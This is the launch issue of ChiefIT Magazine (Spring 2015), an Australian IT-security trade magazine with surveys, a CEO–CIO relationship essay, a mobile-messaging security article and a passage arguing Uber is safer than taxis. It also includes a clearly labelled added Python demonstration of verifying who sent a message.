POWERED BY THE CIO LEADER'S SUMMIT,
ASIA PACIFIC 2015 - 2016 Spring 2015
Reviving the CEO Relationship
Mobile Messaging
Digital Disruption: Is Uber safer?
$8.95 INC. GST
The best way to fend off DDOS
Power of penetration testing
Strategies used by Islamic State to recruit on social media
PLUS TechTime l Cyber-TechTime
PROTECTING BUSINESS AND GOVERNMENT WORLDWIDE.
Cyber Security Solutions
Advanced Threat Intelligence and Investigation
Sophisticated Cyber Analytics
Managed Security Services
Cyber Security Consulting Services
For more information, contact us at learn@baesystems.com
baesystems.com/ai twitter.com/baesystems_ai linkedin.com/company/baesystemsai
Contents
Editor's Desk 3
Quick Q & A - with Stuart Mills 4
Security Survey Summary 6
Cyber Security: Reviving the CEO relationship with his IT heads 8
Mobile Messaging 10
Digital Disruption Paper - Is Uber Safe? 14
It's all about Cyber Security 16
BAE Systems Applied Intelligence Feature 20
The best ways to fend off DDoS attacks 22
The power of penetration testing in boosting cyber resilience 26
'But you are a woman' - with Michelle Weatherhead 28
Security and risk management the next evolution 30
Strategies used by Islamic State to recruit on social media 32
Anatomy of a cyber attack 34
F5 State of application delivery 36
TechTime - the latest news and products 41
Cyber TechTime 44

Page 6 - Reviving the CEO relationship with his IT heads
Page 10 - Digital Disruption Paper - Is Uber Safe?
Page 18 - The power of penetration testing

Executive Editor / Director: Chris Cubbage
Director / Co-founder: David Matrai
Marketing Manager: Kathrine Pecotich
Art Director: Stefan Babij
Correspondents: Kema (Johnson) Rajandran, Sarosh Bana, Adeline Teoh

MARKETING AND ADVERTISING
Kathrine Pecotich
T | +61 8 6361 1786
promoteme@australiansecuritymagazine.com.au

SUBSCRIPTIONS
T | +61 8 6361 1786
subscriptions@mysecurity.com.au

Copyright © 2015 - My Security Media Pty Ltd, 286 Alexander Drive, Dianella, WA 6059, Australia. T | +61 8 6465 4732 E | info@mysecurity.com.au E: editor@australiansecuritymagazine.com.au. All material appearing in Australian Security Magazine is copyright. Reproduction in whole or part is not permitted without permission in writing from the publisher. The views of contributors are not necessarily those of the publisher. Professional advice should be sought before applying the information to particular circumstances.

CONNECT WITH US
www.facebook.com/apsmagazine
www.twitter.com/apsmagazine
www.linkedin.com/groups/Asia-PacificSecurity-Magazine-3378566/about

OUR NETWORK
Like us on Facebook and follow us on Twitter and LinkedIn. We post about new issue releases, feature interviews, events and other topical discussions.
www.youtube.com/user/MySecurityAustralia
www.asiapacificsecuritymagazine.com
www.australiansecuritymagazine.com.au
www.drasticnews.com
www.cctvbuyersguide.com

Correspondents* & Contributors
Kema (Johnson) Rajandran*
Horden Wiltshire
Martin Ryan
Sanjay Samuel
Sarosh Bana*
Stuart Mills
Gavriel Schneider
Dave Jarvis
Adeline Teoh*
Dr Robyn Torok
Glen Francis
Tiong Gee Ng

2 | Chief IT Magazine
Editor's Desk
Welcome to a brand new publication, ChiefIT.me Magazine, launched with our industry partners Media Corp International, who run the CIO Leaders Pacific Series Summit across the ASEAN, Greater China and ANZ regions along with the CIO Academy Asia. In this launch edition of ChiefIT.me Magazine, we look at the safety advantages of Uber and some of the more concerning cyber security trends, and we have a great insight into the CIO and CEO relationship. We have also gathered insights into the corporate board considerations needed for digital disruption and the growing use of application-based architectures. Wherever your organisation is heading, we aim to be informative across the digital transformation spectrum. With our colleagues across Asia we will be looking to compare, contrast, learn and share. Evolving beyond just the web and news channel, we aim to bring the CIO, CISO and CTO fraternity more targeted and insightful learning and networking opportunities, plus an open media platform to work and connect across industries. As part of our launch we are being launched exclusively for the FSI Leaders Summit, Sydney, the CIO Leader’s Summit, Melbourne, and the CIO Academy Asia, based in Singapore. Our other key annual industry events include Gartner, CeBIT, RSA, AISA and AusCERT. ChiefIT.me Magazine will be a sibling publication to the Asia Pacific Security Magazine and Australian Security Magazine, and we continue to have a growing technology channel network. If you’re a new reader, we welcome your subject matter expertise, opinions and research publications - case studies are great too! So engage with us, and we look forward to welcoming new partners who are keen to join and, as always, promote innovations, insights and inspirations!
“The great myth of our times is that technology is communication.” - Libby Larsen
Yours sincerely, Chris Cubbage CPP, RSecP, GAICD, Executive Editor
Quick Q&A with Stuart Mills
Director, ES2 Queensland

How did you get into the security industry?
Similar to most people I suspect, it happened by chance! After roughly a decade of selling enterprise software solutions (mainly CRM and ERP systems) I took a year off and did my MBA at Macquarie Graduate School of Management. Upon completion of this an old boss hired me back into a newly formed company called CyberTrust (now Verizon CyberTrust). I started mostly selling but I soon learnt more and quickly achieved various accreditations which enabled me to start consulting too. It was now 2004, the dawn of PCI DSS, and it was a very good time to have an Honors Degree in Banking and Finance; it became a very exciting new career in Information Security.

How did your current position come about?
After experiencing all aspects of an IT corporate environment - selling and consulting for Cybertrust, then leading the security practice as a Senior Manager at Ernst and Young, then becoming the Head of Security for Bankwest - I thought it was time to do something a little different. I have invested in a rapidly growing IT consulting company called ES2 to help lead the East Coast expansion. ES2 had done great work for me in my role at Bankwest on a number of my major security transformation projects. I felt it was time to leave the Bank and I couldn’t resist the opportunity to take a stake in the company and help lead the future expansion for both Security and Information Management.

What are some of the challenges you think the industry is faced with?
The lines are blurring across all aspects of delivering frictionless experiences to customers. What is clearly being seen is that if companies don’t embrace significant change, then someone somewhere will figure out how to disrupt part of their value chain. The four megatrends currently impacting the world - ‘Cloud’, ‘Big Data’, ‘Social Media’ and ‘Mobile’ - are confusing the hell out of executives. Most companies have not made the necessary investments in infrastructure, frameworks, governance and skills over the past decade to start to leverage any of these megatrends and need help even knowing where to begin. As security professionals we all know the days of a secure perimeter are behind us, but Executive Boards still aren’t really getting the significance of the new digital world. Automation projects designed to eke out 10% productivity improvements here or there are missing the point. ‘Digital Transformation’ is the challenge; Executives should be trying to work out how they can disrupt their own value chain before someone else does. Even the big consulting houses are only just starting to get their positions. In regard to security, the biggest challenge is moving executives’ minds away from compliance to understanding the dynamic nature of threats and the need to realign security controls from just Protect / Detect and embrace the full length of the cyber kill chain (see page 36).

Where do you see the industry heading?
In relation specifically to security, I see more and more of the role of security being outsourced and managed in the cloud by third parties. Big Data analytics will play a huge part in the ability to predict malicious activity (see OpenDNS for example) and give early warning signs to organisations where they may be vulnerable. The need for more and more rapid delivery of functionality to mobile devices for consumers, and the increase in security automation in the software development lifecycle. To me, continuous delivery = continuous monitoring and continuous testing. Just pen testing a change at the end of a development cycle won’t cut it any more as CIOs thirst for velocity of change and reliability of service. I also see a big change in consumer sentiment towards the data that they trust with companies; privacy and ethics will feature much more in a consumer’s decision on where to put their business. Cloud, Big Data, Social and Mobile are no longer separate problems; they are highly interdependent areas of maturity for organisations. New consumers in what I call the ‘Do it for me economy’ just want a service that can predict their needs before they know they need something and offer a simple button that they can press to get it. The only way that organisations can deliver the velocity, scalability, sustainability, and trust that this new generation of consumers want is by achieving massive and constant transformation, and that’s not an IT problem, that’s a Leadership problem. The average tenure of a company on the Fortune 500 in 1965 was over 60 years; it’s now less than 10 years. There’s a reason for that! … the pace of change, driven by visionary leaders and delivered by the right technology partners.

What do you do when you’re not working?
Getting out on the ocean, windsurfing, Supping etc.

Actual title of current position?
Director ES2, Queensland

How long have you been there?
10 seconds

How long have you been in the security industry?
11 years

What are your previous notable positions?
Head of Information Security at Bankwest. Senior Manager IT Risk and Assurance, Ernst & Young. Director, Financial Services Sector, Verizon Cybertrust.

Is there anything else of importance to note about your current position/company?
ES2 are expanding and maturing at a very rapid pace. Our East Coast expansion plans are also coupled with a national overlay of more strategic advisory services to help executives understand the challenges set out above. It’s all very well and good knowing you need to replace a firewall or a proxy, but if you don’t have a multi-year cyber security and information management strategy that embraces cloud, big data, social and mobile then you’re probably just standing still with the decisions you are making.
The Region’s Leading Government and Corporate Security Portals
Print Post Approved PP255003/10110
THE REGION’S LEADING GOVERNMENT AND CORPORATE SECURITY MAGAZINE | www.asiapacificsecuritymagazine.com | July/Aug 2015
THE COUNTRY’S LEADING GOVERNMENT AND CORPORATE SECURITY MAGAZINE | www.australiansecuritymagazine.com.au | Aug/Sep 2015
Cover stories in the current issues:
Security 2015 Q&A
ONVIF & Compliance
Counter-Terrorism Feature Part II: Radicalisation, Role of the Media & ISIS Social Media Tactics
Mobile Messaging
It’s all about Cyber Security
Improved Border Security: The Holy Grail for airports
Security & Risk Management the next evolution
Outstanding Security Performance awards, the OSPAs
Torrentlocker malware reported to the Australian cybercrime online reporting network
From Infosec to intelligence-based cybersecurity
UAVs civil market future expectations
The stratum of work in the security industry
The modern ‘Sherlock Holmes’ of the cyber world…in Silicon Valley
Threats are mounting across the technology landscape
PLUS TechTime | Cyber-TechTime | Movers & Shakers | Quick Q&A and much more... $8.95 INC. GST
For more information and to subscribe visit: www.australiansecuritymagazine.com.au | www.asiapacificsecuritymagazine.com
Security Survey Summary

AUSTRALIAN RESEARCH: Attitudes towards breaches and data theft highlight role of law and penalties
Websense, Inc has announced the results of a survey of 100 Australian security professionals. Nearly all respondents (98%) believe that the law should address serious data breaches that expose consumers’ data through punishments such as fines (59%), mandatory disclosure (65%), and compensation for consumers affected (60%). Twenty-three percent even advocate arrest and a jail sentence for the CEO or board members. Respondents feel that companies that are not taking action against data loss and theft have it as an agenda item, but it’s not yet a high enough priority (38%). Furthermore, 41% say the CEO should hold ultimate responsibility should a breach arise. And the pressure is mounting, as 72% of all respondents believe the advent of the Internet of Things will make companies even more vulnerable to data theft. Nearly three quarters (64%) of respondents say employees would connect to an unsecure WiFi to respond to an urgent request by the CEO or a company executive, with even 42% of security professionals saying they would do so themselves. As data theft disclosures hit the headlines, it appears to be inadvertently helping companies address the issues. More than half (62%) of security professionals feel the publicity has helped other companies create a case for budget, focus and resources. But nearly a quarter (24%) believe that the headlines have hindered this, as they make companies feel powerless to protect against these attacks. Bradley Anstis, ANZ Sales Engineering Manager at Websense, explains: “Despite all of the large-scale attacks we’ve seen over the past year, many businesses still don’t recognise the risks they face and the potentially devastating impact of a breach. Businesses can no longer afford to ignore the risks or to waste time and resources implementing security solutions that aren’t tailored to meet their needs. It’s all about developing the right-sized security strategy for your business. But by taking a holistic, data-centric approach, IT security teams can gain visibility of their security gaps, identify the threats to their data and protect their critical information from data theft.” *

Australian Organisations Lack High Priority Data Security Practices as 31 percent of Workers Indicate that Corporate Confidential Information is at Risk
LogRhythm has announced the results of its Australian Workplace Security study, which highlights the need for better enforcement of corporate data security measures. Nearly a third (31 percent) of respondents to the survey - 1003 employees and managers of medium to large organisations across Australia - reported that there has been at least one recent ‘security event’ at their workplace. When asked about vulnerabilities, a third (33 percent) of employees and 43 percent of managers said that confidential company information is susceptible to being stolen or accessed by unauthorised people. 72 percent of workers believe the greatest threat to data security is employee related, due to employees downloading infected files or malware, or simply not thinking about security. And 16 percent admitted to accessing documents that they shouldn’t really be looking at while at work. The extent of data security exposure that Australian organisations are facing can be seen when relatively small overall percentages are extrapolated into real numbers: the 12 percent of respondents who admitted to having accessed or taken confidential documents from their workplace without proper authority potentially equates to 719,000 employees across Australia. Of great concern too is that, from that group of respondents, 7 percent did so after they had stopped working for the company, the main reason being to help them in their new job. This is a very real example of lost confidentiality and IP. Encouragingly, 95 percent of managers say that their company ‘is serious about the security of information’ and that the majority of its employees take information security seriously (40 percent say that ‘everyone’ takes it seriously and a further 46 percent say that ‘the majority take it seriously’). But LogRhythm is concerned by the 5 percent that say their company is ‘not very serious about the security of information’, as this figure extrapolates to 59,000 managers nationally. *

F5 Survey Indicates Growing Hybrid Deployments Across Asia Pacific
F5 Networks has released findings from ‘The State of Application Delivery in APAC 2015’ survey, which found that enterprise applications are increasingly being moved into the cloud as organisations embrace the “cloud-first” philosophy. Based on survey data from 3,200 IT decision makers across the Asia Pacific (APAC) region, the findings detail their current and planned use of application services.
Growing number of applications and flexibility of cloud
Findings further reveal that the use of applications by APAC companies is growing and shows no sign of abating. Amongst those surveyed, almost half (45%) currently deploy between 1-200 applications, while almost 10 per cent of organisations currently deploy more than 3,000 applications. The study also showed that at least 41 per cent of IT decision makers are open to moving up to a quarter (24%) of their applications to the cloud by 2016, while almost 24 per cent are keen to move between 25 to 50 per cent. “As applications continue to be a critical part of the business strategy, organisations are seeking the same confidence level in cloud deployments that they’ve seen in the data centre. Companies in every industry rely on applications to drive customer engagement, employee productivity and revenue today. In fact, our research revealed that mobile applications and big data analytics are considered more important trends than the Internet of Things. These findings suggest a growing hybrid environment across the region, with a mix of on premise and off premises solutions increasingly being adopted by enterprises,” said Emmanuel Bonnassie, Senior Vice President, Asia Pacific, F5 Networks.
Obstacles for hybrid cloud adoption
Despite the growing popularity of hybrid clouds, 29 per cent of organisations attributed slow adoption to the failure to identify a comprehensive identity and access management policy. Furthermore, another 35 per cent also admitted to a lack of internal knowledge of the scope of cloud usage as an impediment to adoption. *

* For more information on these articles in Security Survey Summary check out our website at www.australiansecuritymagazine.com.au
If you have an entry for Movers & Shakers please email details and photo to editor@australiansecuritymagazine.com.au
The world’s most powerful, easy to use end-to-end security solutions.
Avigilon’s industry-leading HD network video management software, megapixel cameras, access control and video analytics solutions are reinventing security. Learn how at avigilon.com
Reviving the CEO relationship with his IT heads
We know that technology is the future for nations, organisations and individual productivity. We see a vast majority of the human population using technology on a day to day basis: their phones, mobile applications, tablets and other gadgets like wearables. Yet a vast majority of these individuals, many of whom work for corporations, do not care about their IT (information technology) function. Is this of any surprise? We see companies moving their Head of IT roles to report to a CFO, a COO, or other lines of function. If we agree that technology is the future of society, and if a company wants to remain competitive and not be disrupted, why does the CEO not want such a crucial role reporting to him? He could make a world of difference for the company, grow the business in new ways, streamline business costs using tools, enter new markets, innovate, and so on... so why is he not interested in IT?

One IT head once shared this story. On his first day at a new company, it dawned upon him that users approaching the IT function were treating his function akin to going to the laundry. “Doing your laundry is a necessity but one does not like doing it. Doing the laundry takes time, effort and money! In addition, doing the laundry is not an important priority in life; it is something you need to do but might want to consolidate the amount of time doing it to once a week. Just ensure the washing machine works, the clothes come out clean and, if you have a helper who can help iron it, all the better.” On the first day, he was assigned a cubicle near the back entrance. Colleagues remarked, “Ah, the IT guy is here. I need help with my laptop, I am unable to access the internet. Can you check?” As the CIO of the company he felt dejected and wondered if he had entered the wrong company. It was a good first-hand experience of a company with employees who do not understand the IT function even if they may be keen users of technology. Many possess the latest phone and gadgets.

On the other side of the fence, a CEO shared that his CIO only knows how to spend money. His IT department had spent millions of dollars a year. However, his CIO could not demonstrate the value that it brings to the business. When pressed for more clarity and details, he was presented with a deck of over 100 slides detailing system architecture and implementation details, which he had no interest in. What he required from the CIO is in fact very simple: he did not need a 100-slide presentation, but would rather be informed in fewer slides that explain the business value and how IT can help the business, in business terms and not ‘geek talk’.

There are organisations and employees (non-IT) who struggle to appreciate the value of the internal IT organisation and the use of technology to enhance their business operations, to help with innovation and business growth. Similarly, many IT employees have not helped themselves as they struggle to explain how IT can help their company besides doing the basics - laundry 101 - of keeping their machinery working, clothes cleaned and then ironed. IT heads struggle to make themselves relevant to their business because they do not know how to, or do not want to, engage with their non-IT colleagues. At times living in one’s IT world is a good one, as vendors treat us well. Why bother with other colleagues who do not care about what you do? There is also an expectation gap. CEOs want their IT heads to lead and tell them what is needed. IT heads prefer to wait for directions, and when they do engage, they talk in terms that their CEO might not appreciate: “We have to do cloud, big data, analytics, we got to have this mobile app, our storage and networks need an upgrade, etc.” We probably have all but 30 seconds of the CEO’s attention.

Having said the above, this is not true of all companies or leaders we have met. There are technology-savvy CEOs, there are IT functions that report in to the CEO, and there are CIOs and IT heads who are business savvy and are able to engage well with their colleagues across functions. There are CEOs who understand how to leverage technology to the advantage of the business. Such a CEO knows what he wants, and if his IT head cannot meet his need, he replaces him with someone who can.

What could be done to strengthen ties and form lasting relationships between the CEO and his “CIO”? This is a symbiotic relationship. CEOs who fail to appreciate how technology can help their business WILL be disrupted. CIOs who fail to engage with their CEOs will have their careers disrupted. There are companies that recognise that CIOs need to play a more strategic role. In fact some have started to have a COO of IT to look after operational aspects of IT, freeing up the CIO to concentrate on engaging the business and working on strategic business initiatives. Whether this will become the future of IT functions depends very much on how the CIOs engage their CEOs.

To the CEO
• Take interest in technology and learn from the competition how technology can be harnessed to innovate;
• Relook your relationship with your CIO and begin to re-engage;
• The world is evolving at such great technology speed, and there are many new startups with technologies that are disrupting the traditional ways of doing things. Get involved and work with these startups for ideas;
• Leverage your IT to check for new ideas;
• Develop clear business goals for your IT to achieve;
• Where CIOs lack the business or finance skills, groom them with training.

To the CIO (Head of IT)
• IT needs to start being creative by thinking outside the box;
• Always have an inquisitive mind to learn the soft skills and key skills needed to engage with your colleagues. This includes communications, facilitation, finance and presentation skills;
• Be active and join professional associations to network and practise your engagement skills;
• Join the Boards of companies to practise facilitation and put your skills of influence into practice;
• Be open to learning from IT leaders who have done well;
• Pick up the sales skills from your vendors;
• Be humble, just as your vendor sales reps are when treating you;
• Learn the language of business. Many CEOs do not know how to communicate with CIOs as they do not understand, nor have the patience to learn, ‘geek speak’. CEOs are busy people, and the ability to be concise and piece it all together to demonstrate business value will establish the CIO as a trusted partner of the CEO.

With most businesses going through a digital transformation, there has never been a better time for CIOs to prove their value as business leaders. They need to be able to execute all the points listed above and more. The tasks might be daunting, but the rewards and satisfaction that come will be outsized.

Authored By
Glen Francis
President, IDeationEdgeAsia.org; President, CIOAcademyAsia.org; Vice President, ITMA.org.sg
A senior executive with achievements in leading global technology departments, large scale corporate transformation initiatives, helping start-up companies, and being involved in social enterprises. Well-travelled and well versed with the management of teams across various continents.

Ng Tiong Gee
SVP, IT, Engineering and Estate Management, Resort World Sentosa; Independent Board Director, YellowPages Ltd; Lead Independent Board Director, Pacific Radiance Ltd
An accomplished C- and Board-level executive with proven success in building and leading high performance teams across multiple geographies. A strategic thinker who is versatile in playing multiple roles at large and small corporations. Successfully integrated two of the largest independent semiconductor Assembly and Test providers in the role of Lead Integration Manager.

CIO Academy Asia
At CIO Academy Asia, we enable ICT professionals to gain the relevant skills and knowledge they need to advance their careers. We believe success comes when you have the right mentor guiding you. At our academy, we share relevant, real-life industry collaborations. We impart practical knowledge of the inner workings of an ICT environment, which will prepare you to be the next ICT industry leader. Our team of experienced CIO-grade lecturers come from established and listed companies. Our seminars are created with their input, resulting in structured presentations complemented with sensible material. This allows every participant to gain the ‘other’ perspective: how one can be an ICT leader, with the modern proficiency and skills to navigate the ever changing global environment.
Regional
Mobile Messaging Company reputation and security risks rise as business mobile messaging usage increases
By Horden Wiltshire
12 | Chief IT Magazine
P
hone hacking was once thought of as News of the World type media spying on the private calls of royals and celebrities. That’s rapidly changing because any phone user, right now, could be under the watchful eyes of forces far more malevolent than a gossip sheet. Consumer messaging phenomenon, WhatsApp disrupted the highly profitable SMS market and forever changed the power and potential of IP messaging. Consumers flocked to the service and businesses are jumping on the bandwagon to apply it commercially. Soon, business use of IP messaging will outstrip that of consumers. In the $50 billion world of enterprise messaging, businesses of all sizes use mobile to communicate with clients and customers. In addition to exposing personal data, those messages often contain sensitive information such as intellectual property, classified legal documents, medical reports, investment intelligence, and other financial information.
Criminals change their attack patterns quickly

Attacks on traditional IT systems for such information are not new. This year companies from healthcare giants to financial stalwarts have been hit with expensive breaches. US health insurer Anthem was targeted in late January, when attackers went after private information about individuals on its health plans: their names, addresses, birth dates and income data. Morgan Stanley also reported a major breach after an employee took data from around 350,000 wealth-management client accounts, some of which was posted for sale online.

However, attack patterns change quickly and criminals are turning to less protected ecosystems such as mobile devices. The most common exploit is malware contained within apps, often downloaded from third-party app stores or from unknown links. Those behind these hostile invasions want to exploit personal data, audio and screenshots. It is unthinkable to connect a PC or laptop to the internet without up-to-date virus protection, but workers do it every day with phones and tablets. And while companies spend considerable sums securing desktop systems, little thought is given to securing mobile information.

Top management failing to see mobile risks

In fact the management of many of our top companies either does not seem to be aware of the mobile vulnerabilities, or does not think it will happen to them.

Research undertaken at a workshop on enterprise messaging with some of Australia's leading CIOs earlier this year found only 25 per cent of participants regarded secure messaging on a phone as very important. More than half of the CIOs thought it was not important at all, believing people use email, not mobile devices, to communicate important matters. The reality is that critical communication is being conducted outside traditional channels, and increasingly via mobile messaging.

Security weaknesses of devices, from phones with no passcode to unencrypted Wi-Fi transmissions, are magnified further as employers opt for BYOD. With BYOD, businesses are tempted to 'lock down' the entire environment with costly mobile device management (MDM) solutions, which typically create a work/personal split on a device. However, for many businesses MDM is overkill: as much of what businesses do is in a messaging context, a secure messaging solution is suitable and much less expensive.

BYOD users can also be required to run anti-virus software, and that is best practice, but it will not stop a hacker trying to crack the app's code or the device's own software; it just slows them down. Hackers want people to fall for phishing scams so they can install the malware that does their dirty work. These scams also show that a mobile user's identity may be spoofed by an unknown source disguised as a user known to the receiver, and against that, securing the communications channel alone is of no benefit.

Multi-layer encryption changes the game

Some IP solutions say they have secure networks, but securing enterprise mobile messaging involves considerably more than simply encrypting the channel. A key component is verifying the identity of the sender and the recipient; without it, attackers cannot truly be thwarted. Enterprises that have already adopted SMS or consumer-grade IP messaging solutions without this validation are at risk, particularly as hackers begin to target known security limitations more aggressively.

To close the gap, CIOs must focus on securing their entire messaging ecosystems. The starting point is to audit a company's internal and external business workflows, processes and use cases to understand whether a secured ecosystem or a secured mobile solution would better meet their needs. Developing solutions with multiple layers of encryption and auditing capability is where the game is changing, and there is immediate relevance for Australian hospitals, government organisations and financial institutions. For those in highly regulated environments, banking and finance in particular, the ability to track all communications gives CIOs a bird's-eye view of all mobile messaging for auditing purposes.

Secure information a springboard for innovation

However, being able to 'protect' information is more than a security concern: it is a springboard to giving a business the confidence to innovate and be agile in the way it interacts with customers, knowing it is safe to do so. There are certain communications a business either cannot or will not conduct over messaging because of the nature of the conversation. Encrypted messaging means any message, classified or highly confidential, can be delivered via mobile platforms. Industries such as health are fast movers in this space given the obvious sensitivities of patient and case information; the sector is already looking at the benefits of doctor-to-doctor and doctor-to-patient secure messaging.

The secure enterprise messaging market is ripe for disruption, but it will not be led by 'free' consumer apps such as WhatsApp, as they do not meet the specific needs of the business market. These apps fall short of the compliance, security, integration and performance capabilities required by most businesses, particularly large enterprises. While business gets up to speed on how to deal with the risks of mobile messaging, there is a critical first step: at the very least, organisations should have secure messaging for crisis management teams and senior executives to communicate effectively and securely on a daily basis.

About the Author: Horden Wiltshire is CEO of Soprano Design, the creators of GAMMA and the world's leading secure mobile messaging technology provider to international mobile network operators.
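As an added illustration, not part of the article and not Soprano's GAMMA code, the following Python shows the difference between a message whose sender is trusted because it arrived over an encrypted channel and one whose sender is verified end to end. It assumes an enterprise key directory of enrolled users and uses HMAC-SHA256 in place of the signature scheme a real product would use; the users, keys and messages are constructed for the demo. The spoofed message passes the channel-only check and fails the end-to-end one, as do a replay, a tampered copy, a message from an unenrolled sender and a stale message.

```python
"""
Added example (not from the article and not Soprano's GAMMA code): why an encrypted channel alone
does not establish who sent a message. Assumptions: an enterprise key directory mapping each
enrolled user to a secret key, and HMAC-SHA256 standing in for the signature scheme a real product
would use. All users, keys and messages below are constructed for the demo.
"""
import hashlib, hmac, json, secrets, time

MAX_SKEW = 300   # seconds: reject messages older than this (assumed policy value)
AUDIT_LOG = []   # every verification outcome, for the auditing the article describes

def canonical(sender, recipient, msg_id, ts, body):
    """Fixed field order and separators, so the tag covers exactly one encoding."""
    return json.dumps([sender, recipient, msg_id, ts, body], separators=(",", ":")).encode()

def send(sender, key, recipient, body, now=None):
    """Build an envelope carrying a sender-keyed tag over all fields that matter."""
    ts = int(now if now is not None else time.time())
    msg_id = secrets.token_hex(8)
    tag = hmac.new(key, canonical(sender, recipient, msg_id, ts, body), hashlib.sha256).hexdigest()
    return {"from": sender, "to": recipient, "id": msg_id, "ts": ts, "body": body, "tag": tag}

def channel_only_receive(envelope):
    """What TLS between device and server gives the recipient: the 'from' header, as written."""
    return envelope["from"], envelope["body"]

def verify(envelope, directory, me, seen, now=None):
    """End-to-end check. Returns (ok, reason); the tag is checked with the *claimed* sender's key."""
    now = int(now if now is not None else time.time())
    sender, key = envelope["from"], directory.get(envelope["from"])
    if key is None:
        reason = "unknown sender"
    elif envelope["to"] != me:
        reason = "not addressed to me"
    elif abs(now - envelope["ts"]) > MAX_SKEW:
        reason = "stale timestamp"
    elif envelope["id"] in seen:
        reason = "replay"
    else:
        expected = hmac.new(key, canonical(sender, envelope["to"], envelope["id"], envelope["ts"],
                                           envelope["body"]), hashlib.sha256).hexdigest()
        reason = None if hmac.compare_digest(expected, envelope["tag"]) else "bad tag"
    if reason is None:
        seen.add(envelope["id"])   # remember accepted ids so the same message cannot be replayed
    AUDIT_LOG.append({"id": envelope["id"], "from": sender, "to": envelope["to"], "result": reason or "accepted"})
    return reason is None, reason or "accepted"

def demo():
    """Constructed scenario: a genuine CEO message, a spoof from an attacker, a replay, a tampered copy."""
    directory = {"ceo@example.com": secrets.token_bytes(32), "cfo@example.com": secrets.token_bytes(32)}
    attacker_key = secrets.token_bytes(32)   # the attacker never sees the CEO's key
    seen, now = set(), 1_441_065_600         # replay cache; fixed clock so results are deterministic
    me = "cfo@example.com"
    genuine = send("ceo@example.com", directory["ceo@example.com"], me, "Approve the $2m transfer", now)
    spoofed = send("ceo@example.com", attacker_key, me, "Approve the $2m transfer", now)
    stranger = send("mallory@example.com", attacker_key, me, "Hello", now)
    old = send("ceo@example.com", directory["ceo@example.com"], me, "Yesterday's note", now - 86400)
    return {
        "channel_only_sees_spoof_as": channel_only_receive(spoofed)[0],
        "genuine": verify(genuine, directory, me, seen, now),
        "spoofed": verify(spoofed, directory, me, seen, now),
        "replayed": verify(genuine, directory, me, seen, now),
        "tampered": verify(dict(genuine, id=secrets.token_hex(8), body="Approve the $20m transfer"),
                           directory, me, seen, now),
        "stranger": verify(stranger, directory, me, seen, now),
        "stale": verify(old, directory, me, seen, now),
    }

if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:>27}: {result}")
```

The point of the demo is the first line of its output: the channel-only receiver reports the spoofed message as coming from the CEO, because nothing on the wire ever checked that claim. The verifier looks up the key of the claimed sender, so a message tagged with any other key is rejected whatever its header says, and the audit log records every outcome.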
Chief IT Magazine | 13
EXECUTIVE BOARDROOM LUNCHEON INVITATION
EXCLUSIVE TO COLLEAGUES
CIO, CISO & CSO THURSDAY 24 SEPTEMBER 2015 12.15 PM - 2.15 PM
131 ST GEORGES TERRACE, PERTH
Security as an enabler for cloud computing - James Turner, Senior Advisor, IBRS
As an IT leader, you understand the potential advantages and benefits that cloud computing could bring to your business. It can enable you to innovate and accelerate business, enhance customer experience, provide employee workplace mobility and increase efficiency. You are also aware that protecting your organisation's technology assets is one of the biggest challenges in embracing cloud. How can you ensure your cloud environment has rigorous security in place, be it in public, private or hybrid consumption models? Join James Turner, Senior Advisor, IBRS, as he facilitates a discussion on security-business alignment challenges in the mobile cloud era and the safeguards you can put in place to protect your data and applications.
Subject matter experts, Armando Dacal, Regional Vice President, Palo Alto Networks, and Arthur Iliakopoulos, Southern Region Manager, Network and Security, VMware, will also be attending. In this invitation-only executive lunch session, held under Chatham House Rule, we invite you to join your peers in a frank discussion on the challenges and best practices of the journey to cloud. I will be calling you in the next few days to confirm your attendance. Regards,
Chris Cubbage
Director & Executive Editor Australian Security Magazine & ChiefIT Magazine
Kindly RSVP by 15 September to ccubbage@mysecurity.com.au or 0432 743 261
PROUDLY ORGANISED BY
UPCOMING WEBINARS:
Protecting critical value data from the inside FEATURING Keith Lowry, NUIX Senior Vice President, Business Threat Intelligence and Analysis
MORNING SESSION: Date: Thursday 17th September 2015
Time: 9am AEST
Duration: 45 mins + Q&A
Security requirements for critical infrastructure FEATURING Peter Bartzios
Paul Mills
SIEMENS Technical, Sales and Management
SIEMENS Product Manager and subject matter expert
AFTERNOON SESSION: Date: Thursday 17th September 2015
Time: 1pm AEST
Duration: 30 mins + Q&A
To register for these webinars, visit:
www.australiansecuritymagazine.com.au
Cyber Security
DIGITAL DISRUPTION DISCUSSION PAPER:
Is Uber Safer?
Uber is the dominant player in the new era of ridesharing. A common concern that has been raised is the safety of this means of transport, and whether security professionals should be recommending it or banning it. As a security professional with a global focus I recommend Uber and consider it a significantly safer option than a regular taxi service. This article seeks to argue, from a security standpoint, why Uber is the safer alternative.

Driver information - When you book an Uber you already have the driver's name, licence plate number, photo and type of vehicle. This means you can check that the person picking you up is the registered driver before entering the car. In many countries taxis do not display a visible photographic licence, or you are unable to compare it to the driver until you are already in the vehicle. Additionally, taxi licences often display a number with no visible way of telling whether the licence belongs to this particular taxi, or whether it has expired or been cancelled.

Visible vehicle approach - You can see the status of your vehicle on approach, which means you can remain inside the safety of your home or office until the vehicle has arrived. Particularly when leaving busy nightclub or bar districts, the ability to remain within the security of a venue rather than standing on the street is a bonus. A large number of violent altercations occur on the streets of such districts, often at taxi ranks where intoxicated individuals cut the line. Some taxi apps also provide this flexibility, but this is often limited outside developed countries.

Tracking - Although some developed countries have hardwired GPS systems in their taxis that the driver is unable to switch off, most taxis globally do not have this technology. It is true that the tracking system used by Uber can be disabled by a driver shutting off their phone. But what are the benefits of a tracking system for personal safety? Taxi companies do not live-track their drivers and take action if they detour off their route, so the tracking technology is really only of evidentiary benefit after an incident occurs. The strength of Uber's system is the ability for a supervisor or a friend to live-track your progress. They can either order an Uber on their own phone, place their colleague or friend into the Uber and then track them on their way home, or have you activate the 'share your ETA' feature on your own mobile, which also provides them with live tracking. As a manager, if I send a drunk colleague home in a cab, the best I can do is record the taxi plate. However, using my Uber app I can live-monitor them all the way to their destination, and if the tracking is switched off, I already have the vehicle details and last known position to provide to police for an immediate response.

